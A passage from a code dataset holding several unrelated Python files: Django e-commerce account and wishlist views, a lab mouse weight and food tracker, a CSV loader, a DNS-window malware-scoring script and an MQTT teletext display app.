RegisterForm(request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n user.set_password(form.cleaned_data['password'])\n user.is_active = False\n user.save()\n\n cart = Cart.objects.create(user=user)\n send_confirmation_mail(user=user, current_site=get_current_site(request))\n # current_site = get_current_site(request)\n # send_activate_link(user,current_site.domain,urlsafe_base64_encode(force_bytes(user.pk)), account_activation_token.make_token(user),)\n messages.add_message(request, messages.SUCCESS, f\"Activation mail sended!\") \n return redirect(reverse_lazy('account:login'))\n return render(request,'register.html', context={'form':form})\n\n\nclass ActiveAccountView(View):\n def get(request, *args, **kwargs):\n uidb64 = kwargs['uidb64']\n token = kwargs['token']\n try:\n uid = force_str(urlsafe_base64_decode(uidb64))\n user = User.objects.get(pk=uid)\n except (TypeError, ValueError, OverflowError, User.DoesNotExist):\n user = None\n\n if user is not None and account_activation_token.check_token(user, token):\n user.is_active = True\n user.save()\n return redirect(reverse_lazy(\"account:login\"))\n else:\n return render(request, 'activation.html')\n\n\ndef vendor_profile(request):\n return render(request, 'vendor-profile.html')\n \n\ndef wishlist(request):\n if request.user.is_authenticated:\n wishlist = WishList.objects.filter(user=request.user)\n \n if wishlist:\n images = []\n for wish in wishlist:\n images.append(Image.objects.filter(variant = wish.variant).filter(is_main=True).first())\n else:\n images = []\n else:\n if request.session.get(\"wishlist\"):\n variants_ids = request.session[\"wishlist\"].split()\n images = Image.objects.filter(variant__id__in=(variants_ids)).filter(is_main=True)\n else:\n images = []\n \n context = {\n 'images': images\n }\n\n return render(request, 'wishlist.html', context)\n\n\ndef remove_item(request, variant_id):\n if request.user.is_authenticated:\n item = get_object_or_404(WishList, user=request.user, variant__id=variant_id)\n item.delete()\n else:\n if request.session.get(\"wishlist\"):\n variants_ids = request.session[\"wishlist\"].split()\n if str(variant_id) in variants_ids:\n variants_ids.remove(str(variant_id))\n request.session[\"wishlist\"] = \" \".join(variants_ids)\n request.session.modified = True\n\n messages.success(request, \"The Product has been Removed from the Wishlist!\")\n\n return redirect('account:wishlist')\n\n\ndef add_item(request, variant_id):\n if request.user.is_authenticated:\n variant = Variant.objects.filter(id=variant_id).first()\n wishlist = WishList.objects.filter(user=request.user)\n variants = []\n\n for wish in wishlist:\n variants.append(wish.variant)\n\n if variant in variants:\n return redirect('core:error')\n else:\n WishList.objects.create(user=request.user, variant=variant)\n \n else:\n existing_variant = request.session.get(\"wishlist\", \"\")\n existing_variant = existing_variant + ' ' + str(variant_id)\n request.session[\"wishlist\"] = existing_variant.strip()\n\n messages.success(request, _(\"The Product has been Added to the Wishlist!\"))\n\n return redirect('account:wishlist')\n\n\ndef logout_request(request):\n logout(request)\n return redirect('account:login')\n\n\n", "repo_name": "rustamzada0/Django-Web-Project-E-Commerce---Multikart-", "sub_path": "account/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6894, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.shortcuts.redirect", "line_number": 34, "usage_type": "call"}, {"api_name": "django.urls.reverse_lazy", "line_number": 34, "usage_type": "call"}, {"api_name": "models.User.objects.filter", "line_number": 40, "usage_type": "call"}, {"api_name": "models.User.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 40, "usage_type": "name"}, {"api_name": "models.User.objects.get", "line_number": 41, "usage_type": "call"}, {"api_name": "models.User.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 41, "usage_type": "name"}, {"api_name": "models.User.objects.filter", "line_number": 45, "usage_type": "call"}, {"api_name": "models.User.objects", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 45, "usage_type": "name"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 49, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 51, "usage_type": "call"}, {"api_name": "django.contrib.messages.add_message", "line_number": 52, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 52, "usage_type": "name"}, {"api_name": "django.contrib.messages.SUCCESS", "line_number": 52, "usage_type": "attribute"}, {"api_name": "django.shortcuts.redirect", "line_number": 53, "usage_type": "call"}, {"api_name": "django.urls.reverse_lazy", "line_number": 53, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 56, "usage_type": "call"}, {"api_name": "forms.ProfileForm", "line_number": 63, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 68, "usage_type": "call"}, {"api_name": "django.urls.reverse_lazy", "line_number": 68, "usage_type": "call"}, {"api_name": "forms.ProfileForm", "line_number": 70, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 77, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 59, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 82, "usage_type": "call"}, {"api_name": "django.urls.reverse_lazy", "line_number": 82, "usage_type": "call"}, {"api_name": "forms.RegisterForm", "line_number": 84, "usage_type": "call"}, {"api_name": "forms.RegisterForm", "line_number": 86, "usage_type": "call"}, {"api_name": "payment.models.Cart.objects.create", "line_number": 93, "usage_type": "call"}, {"api_name": "payment.models.Cart.objects", "line_number": 93, "usage_type": "attribute"}, {"api_name": "payment.models.Cart", "line_number": 93, "usage_type": "name"}, {"api_name": "account.tasks.send_confirmation_mail", "line_number": 94, "usage_type": "call"}, {"api_name": "django.contrib.sites.shortcuts.get_current_site", "line_number": 94, "usage_type": "call"}, {"api_name": "django.contrib.messages.add_message", "line_number": 97, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 97, "usage_type": "name"}, {"api_name": "django.contrib.messages.SUCCESS", "line_number": 97, "usage_type": "attribute"}, {"api_name": "django.shortcuts.redirect", "line_number": 98, "usage_type": "call"}, {"api_name": "django.urls.reverse_lazy", "line_number": 98, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 99, "usage_type": "call"}, {"api_name": "django.views.generic.View", "line_number": 102, "usage_type": "name"}, {"api_name": "django.utils.encoding.force_str", "line_number": 107, "usage_type": "call"}, {"api_name": "django.utils.http.urlsafe_base64_decode", "line_number": 107, "usage_type": "call"}, {"api_name": "models.User.objects.get", "line_number": 108, "usage_type": "call"}, {"api_name": "models.User.objects", "line_number": 108, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 108, "usage_type": "name"}, {"api_name": "models.User.DoesNotExist", "line_number": 109, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 109, "usage_type": "name"}, {"api_name": "tokens.account_activation_token.check_token", "line_number": 112, "usage_type": "call"}, {"api_name": "tokens.account_activation_token", "line_number": 112, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 115, "usage_type": "call"}, {"api_name": "django.urls.reverse_lazy", "line_number": 115, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 117, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 121, "usage_type": "call"}, {"api_name": "models.WishList.objects.filter", "line_number": 126, "usage_type": "call"}, {"api_name": "models.WishList.objects", "line_number": 126, "usage_type": "attribute"}, {"api_name": "models.WishList", "line_number": 126, "usage_type": "name"}, {"api_name": "product.models.Image.objects.filter", "line_number": 131, "usage_type": "call"}, {"api_name": "product.models.Image.objects", "line_number": 131, "usage_type": "attribute"}, {"api_name": "product.models.Image", "line_number": 131, "usage_type": "name"}, {"api_name": "product.models.Image.objects.filter", "line_number": 137, "usage_type": "call"}, {"api_name": "product.models.Image.objects", "line_number": 137, "usage_type": "attribute"}, {"api_name": "product.models.Image", "line_number": 137, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 145, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 150, "usage_type": "call"}, {"api_name": "models.WishList", "line_number": 150, "usage_type": "argument"}, {"api_name": "django.contrib.messages.success", "line_number": 160, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 160, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 162, "usage_type": "call"}, {"api_name": "product.models.Variant.objects.filter", "line_number": 167, "usage_type": "call"}, {"api_name": "product.models.Variant.objects", "line_number": 167, "usage_type": "attribute"}, {"api_name": "product.models.Variant", "line_number": 167, "usage_type": "name"}, {"api_name": "models.WishList.objects.filter", "line_number": 168, "usage_type": "call"}, {"api_name": "models.WishList.objects", "line_number": 168, "usage_type": "attribute"}, {"api_name": "models.WishList", "line_number": 168, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 175, "usage_type": "call"}, {"api_name": "models.WishList.objects.create", "line_number": 177, "usage_type": "call"}, {"api_name": "models.WishList.objects", "line_number": 177, "usage_type": "attribute"}, {"api_name": "models.WishList", "line_number": 177, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 184, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 184, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 184, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 186, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 190, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 191, "usage_type": "call"}]} +{"seq_id": "2633297153", "text": "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom toolbox.mouse_In_excel import DataProcessor\nimport pickle\n\nclass Mouse:\n def __init__(self, name=None, cage_number=None, weight_list=None, date_list=None, weight_date_df=None, delta_weight=None, input_time=None, kill_time=None, kill_df=None, mouse_description=None, exception_description=None, location=None,\n input_food=None, release_food=None, mouse_kill=None):\n \"\"\"\n 初始化 Mouse 类的实例。\n\n Parameters:\n name (str): 鼠的名称。\n cage_number (int): 笼子编号。\n weight_list (list, np.ndarray, pd.Series): 包含鼠体重数据的列表、数组或 Series。\n date_list (list, pd.Series): 包含日期数据的列表或日期列。\n weight_date_df (pd.DataFrame): 包含体重和日期数据的 DataFrame。\n delta_weight (list, np.ndarray, pd.Series): 包含体重变化率的列表、数组或 Series。\n input_time (str): 鼠的录入时间。\n kill_time (str): 鼠的结束时间。\n kill_df (pd.DataFrame): 包含结束数据的 DataFrame。\n mouse_description (str): 关于鼠的描述。\n exception_description (str): 异常情况描述。\n location (str): 描述鼠所在的文件的位置\n input_food (dict): 包含进食数据的字典。\n release_food (dict): 包含剩余粮食数据的字典。\n mouse_kill (dict): 包含杀鼠表数据的字典。\n \"\"\"\n self.name = name\n self.cage_number = cage_number\n self.location = location\n self.input_food = input_food\n self.release_food = release_food\n self.kill = mouse_kill\n\n # 初始化 weight_list\n if weight_list is not None:\n if isinstance(weight_list, (list, np.ndarray)):\n self.weight_list = weight_list\n elif isinstance(weight_list, pd.Series):\n self.weight_list = weight_list\n else:\n raise ValueError(\"weight_list should be a list, NumPy array, or a DataFrame column.\")\n else:\n self.weight_list = None\n\n # 初始化 date_list\n if date_list is not None:\n if isinstance(date_list, list):\n self.date_list = pd.to_datetime(date_list, errors='coerce')\n elif isinstance(date_list, pd.Series):\n self.date_list = pd.to_datetime(date_list, errors='coerce')\n else:\n raise ValueError(\"date_list should be a list or a DataFrame column.\")\n else:\n self.date_list = None\n\n # 初始化 weight_date_df,进食变化\n if weight_date_df is None:\n self.weight_date_df = self.weight2data()\n else:\n self.weight_date_df = weight_date_df\n\n self.delta_weight = delta_weight\n\n # 快速的判断和转化日期时间\n self.input_time = pd.to_datetime(input_time, errors='coerce') if input_time is not None else None\n self.kill_time = pd.to_datetime(kill_time, errors='coerce') if kill_time is not None else None\n\n self.kill_df = kill_df\n self.mouse_description = mouse_description\n self.exception_description = exception_description\n\n def weight2data(self):\n \"\"\"\n 创建包含粮食数量和日期数据的 DataFrame。\n\n Returns:\n pd.DataFrame: 包含体重和日期数据的 DataFrame。\n \"\"\"\n if self.date_list is not None and self.weight_list is not None:\n data_dict = {\n \"date\": self.date_list,\n self.name: self.weight_list\n }\n data_df = pd.DataFrame(data_dict)\n return data_df\n else:\n raise ValueError(\"Both date_list and weight_list must be provided to create the DataFrame.\")\n\n def plot_data(self, x, y, title, x_label, y_label, color):\n \"\"\"\n 绘制数据随时间的变化图。\n\n Parameters:\n x (list, np.ndarray, pd.Series): X 轴数据。\n y (list, np.ndarray, pd.Series): Y 轴数据。\n title (str): 图的标题。\n x_label (str): X 轴标签。\n y_label (str): Y 轴标签。\n color (str): 曲线颜色。\n \"\"\"\n plt.figure(figsize=(10, 6))\n plt.plot(x, y, marker='o', linestyle='-', color=color)\n plt.xlabel(x_label)\n plt.ylabel(y_label)\n plt.title(title)\n plt.grid(True)\n plt.show()\n\n def plot_weight(self):\n # 绘制体重随时间的变化图\n self.plot_data(self.weight_list.keys(), self.weight_list, f'{self.name}的体重变化', '日期', '体重', 'b')\n\n def plot_delta_weight(self):\n # 绘制体重变化率随时间的变化图\n self.plot_data(self.delta_weight.keys(), self.delta_weight, f'{self.name}的体重变化率', '日期', '体重变化率', 'g')\n\n def plot_eat_food(self):\n # 绘制每周进食情况随时间的变化图\n self.plot_data(self.weight_date_df.keys(), self.weight_date_df, f'{self.name}的进食变化', '日期', '每周的进食变化', 'g')\n\n def change_data(self, decide, chose, new_value, date):\n \"\"\"\n 根据选择的参数更改鼠的数据。\n\n Parameters:\n decide (str): 决定是添加数据还是删除数据。\n chose (str): 决定是更改体重记录、杀鼠表、新增粮食还是剩余粮食。\n new_value: 新的数据值。\n date: 数据的日期。\n \"\"\"\n mouse_location = self.location\n if chose == \"体重记录\":\n sheet_name = \"体重记录\"\n print(self.weight_list)\n elif chose == \"杀鼠表\":\n sheet_name = \"杀鼠表\"\n elif chose == \"新增粮食\":\n sheet_name = \"新增粮食\"\n print(self.input_food)\n elif chose == \"剩余粮食\":\n sheet_name = \"剩余粮食\"\n # self.release_food = np.nan\n print(self.release_food)\n # self.release_food\n\n def addge_mouse(self, chose, date, value):\n \"\"\"\n 添加或更改鼠的数据。\n\n Parameters:\n chose (str): 决定是更改体重记录、杀鼠表、新增粮食还是剩余粮食。\n date: 数据的日期。\n value: 新的数据值。\n \"\"\"\n # 兼顾增加新数据���改写老数据的方法\n if chose == \"体重记录\":\n self.weight_list[date] = value\n # print(self.weight_list)\n elif chose == \"杀鼠表\":\n sheet_name = \"杀鼠表\"\n self.kill[date] = value\n elif chose == \"新增粮食\":\n sheet_name = \"新增粮食\"\n self.input_food[date] = value\n # print(self.input_food)\n elif chose == \"剩余粮食\":\n sheet_name = \"剩余粮食\"\n # self.release_food = np.nan\n # print(self.release_food)\n self.release_food = value\n\n def remove_mouse(self, chose, date):\n \"\"\"\n 从鼠的数据中删除指定日期的记录。\n\n Parameters:\n chose (str): 决定是删除体重记录、杀鼠表、新增粮食还是剩余粮食的记录。\n date: 数据的日期。\n \"\"\"\n if chose == \"体重记录\":\n if date in self.weight_list:\n del self.weight_list[date]\n elif chose == \"杀鼠表\":\n if date in self.kill:\n del self.kill[date]\n elif chose == \"新增粮食\":\n if date in self.input_food:\n del self.input_food[date]\n elif chose == \"剩余粮食\":\n if date in self.release_food:\n del self.release_food[date]\n\n def save_mouse(self, file_path=\"test_mouse.pkl\"):\n \"\"\"\n 保存鼠的数据到本地文件。\n\n Parameters:\n file_path (str): 要保存鼠数据的文件路径。\n \"\"\"\n with open(file_path, \"wb\") as file:\n pickle.dump(self, file)\n\n\ndef make_mouse(input_data=\"mouse-data\\\\test-data\", output_file=\"out-test\", mouse_number=\"mouse_109\", mouse_cage=\"cage_29\"):\n \"\"\"\n 创建 Mouse 对象并初始化它的属性。\n\n Parameters:\n input_data (str): 输入数据文件路径。\n output_file (str): 输出文件路径。\n mouse_number (str): 鼠的编号。\n mouse_cage (str): 笼子编号。\n\n Returns:\n Mouse: 初始化后的 Mouse 对象。\n \"\"\"\n data_processor = DataProcessor(input_data + '.xlsx', output_file + '.xlsx')\n mouse_108 = data_processor.make_excel_mouse(mouse_number=mouse_number, mouse_food=\"MCD1\", mouse_cage=mouse_cage)\n\n test_mouse = Mouse(\n name=mouse_108['name'],\n weight_date_df=mouse_108[f\"{mouse_cage}的每周进食量\"],\n weight_list=mouse_108[f\"{mouse_number}的体重\"],\n delta_weight=mouse_108[f\"{mouse_number}的体重变化\"],\n mouse_description=mouse_108[f\"{mouse_number}的描述\"],\n date_list=list(mouse_108[f\"{mouse_number}的体重\"].keys()),\n location=mouse_108[\"location\"],\n input_food=mouse_108[f\"{mouse_cage}的新增粮食\"],\n release_food=mouse_108[f\"{mouse_cage}的剩余粮食\"],\n mouse_kill=mouse_108[\"杀鼠表\"]\n )\n\n return test_mouse\n", "repo_name": "a-green-hand-jack/mouse", "sub_path": "toolbox/Mouse.py", "file_name": "Mouse.py", "file_ext": "py", "file_size_in_byte": 9425, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "numpy.ndarray", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 51, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 53, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 68, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 69, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 204, "usage_type": "call"}, {"api_name": "toolbox.mouse_In_excel.DataProcessor", "line_number": 220, "usage_type": "call"}]} +{"seq_id": "15591621759", "text": "import csv\nfrom pathlib import Path\n\n\nDATA_PATH = Path(__file__).parent.parent / 'data'\nPROFILE_DATA_PATH = DATA_PATH / 'profile_data.csv'\n\n\nwith open(PROFILE_DATA_PATH) as f:\n reader = csv.DictReader(f)\n all_profiles_raw = [dict(x) for x in reader]\n\n\ndef flat_profile(raw_profile):\n d = raw_profile.copy()\n d['favourite_shop'] = raw_profile['shop_1']\n del d['shop_1'], d['shop_2']\n return d\n\n\nall_profiles = [flat_profile(p) for p in all_profiles_raw]\n", "repo_name": "skiller-whale/core-python", "sub_path": "exercises/tuples/example_data.py", "file_name": "example_data.py", "file_ext": "py", "file_size_in_byte": 471, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "88", "api": [{"api_name": "pathlib.Path", "line_number": 5, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "9950228854", "text": "from re import DEBUG\nfrom numpy.lib.arraysetops import unique\nimport psycopg2\nfrom psycopg2.extras import execute_values\nimport pandas as pd\nimport numpy as np\nimport time\nimport pprint\n\npp = pprint.PrettyPrinter(indent=4)\n\n# With LLR2 we intend to set-to-0 (zeroing) the NOSFX values between two thresholds.\n#\n#\n#\n#\n#\n#\n#\n#\n\n\ndb = psycopg2.connect(\"host=localhost dbname=dns user=postgres password=postgres\")\n\n\ndef f_llr(s_nosfx):\n num = s_nosfx.replace(\n [0, 1], [0.000_000_000_000_000_1, 1 - 0.000_000_000_000_000_1]\n )\n den = np.ones(len(num)) - num\n llr = np.log(num / den)\n return llr\n\n\ndf_pcap = pd.read_sql(\n 'SELECT id, \"name\", \"malware_id\", \"infected\", \"qr\", q, r, \"unique\", days FROM pcap ORDER BY name',\n db,\n)\n\nwindows = [\n 2500,\n 500,\n 100,\n]\n\nmax_q = np.lcm.reduce(windows) * (1_000_000 // np.lcm.reduce(windows))\n\nquery = \"\"\"\nDROP TABLE IF EXISTS public.window_qr_4;\n\nCREATE TABLE IF NOT EXISTS public.window_qr_4\n(\n id integer NOT NULL GENERATED ALWAYS AS IDENTITY ( INCREMENT 1 START 1 MINVALUE 1 MAXVALUE 2147483647 CACHE 1 ),\n pcap_id integer NOT NULL,\n size integer NOT NULL,\n \"window\" integer NOT NULL,\n\n \"first\" integer[] DEFAULT '{0,0,0}'::integer[],\n \"last\" integer[] DEFAULT '{0,0,0}'::integer[],\n\n \"begin_time\" real DEFAULT 0.0,\n \"end_time\" real DEFAULT 0.0,\n\n \"app\" integer[] DEFAULT '{0,0,0}'::integer[],\n \"unique\" integer[] DEFAULT '{0,0,0}'::integer[],\n\n \"nx\" integer DEFAULT 0,\n\n \"gt09\" double precision,\n\n \"llr\" double precision[] DEFAULT '{0,0,0}'::double precision[],\n \"llr_t\" double precision[] DEFAULT '{0,0,0}'::double precision[],\n\n CONSTRAINT window_qr_4_pkey PRIMARY KEY (id)\n)\n\nTABLESPACE pg_default;\n\nALTER TABLE public.window_qr_4\n OWNER to postgres;\n\"\"\"\n\ncur = db.cursor()\n\ncur.execute(query)\n\ncur.close()\n\ndb.commit()\n\nBATCH_SIZE = 10_000_000\n\npd.options.display.float_format = '{:.2f}'.format\n\nfor idx, pcap in df_pcap.iterrows():\n\n cur = db.cursor()\n\n query = \"\"\"SELECT m3.fn,\n is_response\n FROM message3 as m3\n WHERE pcap_id=%d\n ORDER BY fn\"\"\" % pcap.id\n df_fn = pd.read_sql(query, db)\n\n df_fn_q = df_fn[~df_fn.is_response].fn.to_frame().copy()\n df_fn_q['n'] = np.arange(df_fn_q.shape[0])\n df_fn_q['batch'] = df_fn_q['n'] // BATCH_SIZE\n\n print(\"Processing pcap %d [%d/%d]\" % (pcap.id, idx, df_pcap.shape[0]))\n\n for s in windows[::-1]:\n \n # the windows bounds are defined by the number of queries (qnum = s), because I suppose\n # that is better to trigger the intrusion detector whit a threshold dependent on the number of queries.\n df_fn_q_s = df_fn_q.copy()\n df_fn_q_s['window'] = df_fn_q_s['n'] // s\n df_fn_q_s = df_fn_q_s[['window', 'fn']].groupby(by='window').aggregate(['first']).reset_index()\n df_fn_q_s.columns = ['window', 'first_fn']\n df_fn_q_s['last_fn'] = df_fn_q_s['first_fn'].shift(-1, fill_value=df_fn.fn.max() + 1) - 1\n df_fn_q_s['batch'] = df_fn_q_s['last_fn'] // BATCH_SIZE\n\n for i in range(df_fn_q_s.batch.max()+1):\n df_fn_q_s_batch = df_fn_q_s[df_fn_q_s.batch == i]\n\n first_fn_bacth = df_fn_q_s_batch['first_fn'].min()\n last_fn_bacth = df_fn_q_s_batch['last_fn'].max()\n\n tic = time.perf_counter()\n query = (\n \"\"\"SELECT m3.*, dn.\"logit.0\"[1] as logit, dn.top10m\n FROM message3 as m3 JOIN dn ON m3.dn_id=dn.id\n WHERE pcap_id=%d AND fn >= %d AND fn <= %d\n ORDER BY fn\"\"\"\n % (\n pcap.id,\n first_fn_bacth,\n last_fn_bacth\n )\n )\n df_w_batch = pd.read_sql(query, db)\n\n df_w_batch['nx'] = (df_w_batch.rcode == 3)\n df_w_batch['nlegit'] = (df_w_batch.top10m >= 1_000_000)\n\n print(\"Fetching from %d <= fn <= %d for pcap_%d and size=%d\" % (first_fn_bacth, last_fn_bacth, pcap.id, s))\n values = []\n for (_, s_window) in df_fn_q_s_batch.iterrows():\n\n first_fn = s_window['first_fn']\n last_fn = s_window['last_fn']\n\n df_qr = df_w_batch.iloc[first_fn:last_fn+1]\n df_q = df_qr[~df_qr.is_response]\n df_r = df_qr[df_qr.is_response]\n if df_r.shape[0] == 0:\n df_r = df_r.append(pd.Series(0, index=df_r.columns), ignore_index=True)\n\n dfs = [df_qr, df_q, df_r]\n\n sum_cols = [\"app\", \"ok\", \"txt\", \"nx\", \"no\", \"other\", \"llr\"]\n\n app = [ _df.shape[0] for _df in dfs ]\n\n first = [ _df.iloc[0].fn for _df in dfs ]\n last = [ _df.iloc[-1].fn for _df in dfs ]\n\n begin_time = df_qr.iloc[0].time_s\n end_time = df_qr.iloc[-1].time_s\n\n nunique = [ _df.dn_id.drop_duplicates().shape[0] for _df in dfs ]\n\n nx = df_r.nx.sum()\n\n gt09 = (dfs[1].logit > 0.9).sum()\n\n llr = [ _df.logit.sum() for _df in dfs ]\n\n llr_t = [ _df.logit[_df.nlegit].sum() for _df in dfs ]\n\n def cv(v):\n if type(v).__module__ == np.__name__:\n return v.item()\n if type(v).__name__ == \"list\":\n return [ vv.item() if type(vv).__module__ == np.__name__ else vv for vv in v ]\n return v\n\n values.append([ cv(v) for v in [pcap.id, s, s_window['window'], first, last, begin_time, end_time, app, nunique, nx, gt09, llr, llr_t ] ])\n pass #end window\n # print(\"\\n\".join([v.__str__() for v in values]))\n # print()\n execute_values(\n cur,\n \"\"\"INSERT INTO public.window_qr_4(\n pcap_id, size, \"window\", first, last, begin_time, end_time, app, \"unique\", nx, gt09, llr, llr_t)\n VALUES %s;\"\"\",\n values\n )\n pass #end batch\n db.commit()\n pass #end batches\n pass #end pcap\n cur.close()\n", "repo_name": "princio/malware_detection", "sub_path": "src/python/windowing_r.py", "file_name": "windowing_r.py", "file_ext": "py", "file_size_in_byte": 6253, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pprint.PrettyPrinter", "line_number": 10, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.lcm.reduce", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.lcm", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pandas.options", "line_number": 93, "usage_type": "attribute"}, {"api_name": "pandas.read_sql", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 107, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 129, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 141, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.__name__", "line_number": 182, "usage_type": "attribute"}, {"api_name": "numpy.__name__", "line_number": 185, "usage_type": "attribute"}, {"api_name": "psycopg2.extras.execute_values", "line_number": 192, "usage_type": "call"}]} +{"seq_id": "11658182637", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nteletext.py\nMIT License (c) Faure Systems <dev at faure dot systems>\n\nDisplays message received from MQTT server in fullscreen on main monitor and play a sound.\n\nTo switch MQTT broker, kill the program and start again with new arguments.\nUse -d option to start in windowed mode instead of fullscreen.\n\nusage: python3 teletext.py [-h] [-s SERVER] [-p PORT] [-d] [-l LOGGER]\n\noptional arguments:\n -h, --help show this help message and exit\n -s SERVER, --server SERVER\n change MQTT server host\n -p PORT, --port PORT change MQTT server port\n -d, --debug set DEBUG log level\n -l LOGGER, --logger LOGGER\n use logging config file\n\nTo switch MQTT broker, kill the program and start again with new arguments.\n\"\"\"\n\nimport paho.mqtt.client as mqtt\nimport os, sys, uuid\n\nfrom constants import *\nfrom TeletextApp import TeletextApp\nfrom Singleton import Singleton, SingletonException\n\n\nme = None\ntry:\n me = Singleton()\nexcept SingletonException:\n sys.exit(-1)\nexcept BaseException as e:\n print(e)\n\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\n\n# translation\nimport gettext\n\ntry:\n gettext.find(APPLICATION)\n traduction = gettext.translation(APPLICATION, localedir='locale', languages=['fr'])\n traduction.install()\nexcept:\n _ = gettext.gettext # cool, this hides PyLint warning Undefined name '_'\n\nmqtt_client = mqtt.Client(uuid.uuid4().urn, clean_session=True, userdata=None)\n\napp = TeletextApp(sys.argv, mqtt_client, debugging_mqtt=False)\n\n# guizero event loop\napp.loop()\n\ndel me\n\nsys.exit(0)\n", "repo_name": "xcape-io/PyTeletextProps", "sub_path": "teletext.py", "file_name": "teletext.py", "file_ext": "py", "file_size_in_byte": 1575, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "88", "api": [{"api_name": "Singleton.Singleton", "line_number": 36, "usage_type": "call"}, {"api_name": "Singleton.SingletonException", "line_number": 37, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 38, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 42, "usage_type": "call"}, {"api_name": "gettext.find", "line_number": 48, "usage_type": "call"}, {"api_name": "gettext.translation", "line_number": 49, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 52, "usage_type": "attribute"}, {"api_name": "paho.mqtt.client.Client", "line_number": 54, "usage_type": "call"}, {"api_name": "paho.mqtt.client", "line_number": 54, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 54, "usage_type": "call"}, 